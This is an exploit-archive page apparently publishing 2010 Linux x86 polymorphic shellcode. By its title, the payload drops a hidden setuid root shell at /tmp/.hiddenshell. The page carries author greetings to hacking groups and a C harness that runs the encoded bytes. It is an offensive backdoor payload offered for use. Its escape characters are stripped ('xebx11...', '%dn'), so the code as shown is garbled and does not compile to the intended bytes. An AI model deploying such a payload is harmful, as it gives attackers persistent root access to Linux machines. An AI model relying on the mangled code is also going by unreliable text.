161 bytes Drop suid shell root in /tmp/.hiddenshell Linux Polymorphic Shellcode

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 161 bytes Drop suid shell root in /tmp/.hiddenshell Linux Polymorphic Shellcode
# Published : 2010-07-05
# Author :
# Previous Title : Linux x86 /bin/sh Null-Free Polymorphic Shellcode - 46 bytes
# Next Title : Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes

/*
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (exploit-db.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/

#include <stdio.h>

char shellcode[] = "xebx11x5ex31xc9xb1x89x80x6cx0exffx35x80xe9x01"
		   "x75xf6xebx05xe8xeaxffxffxffx95x66xf5x66x07xe5"
		   "x40x87x9dxa3x64xa8x9dx9dx64x64x97x9exbex18x87"
		   "x9dx62x98x98x98xbex16x87x20x3cx86x88xbex16x02"
		   "xb5x96x1dx29x34x34x34x98xa5x55x64x97x9exa3x64"
		   "x64xa8x9dx55x64xa9xa2xa5x64x63x9dx9ex99x99x9a"
		   "xa3xa8x9dx9axa1xa1x70x55x98x9dxa4xacxa3x55xa7"
		   "xa4xa4xa9x6fxa7xa4xa4xa9x55x64xa9xa2xa5x64x63"
		   "x9dx9ex99x99x9axa3xa8x9dx9axa1xa1x70x55x98x9d"
		   "xa2xa4x99x55x69x6cx6ax6ax55x64xa9xa2xa5x64x63"
		   "x9dx9ex99x99x9axa3xa8x9dx9axa1xa1";
		
int main(void)
{
	fprintf(stdout,"Length: %dn",strlen(shellcode));
	(*(void(*)()) shellcode)();
}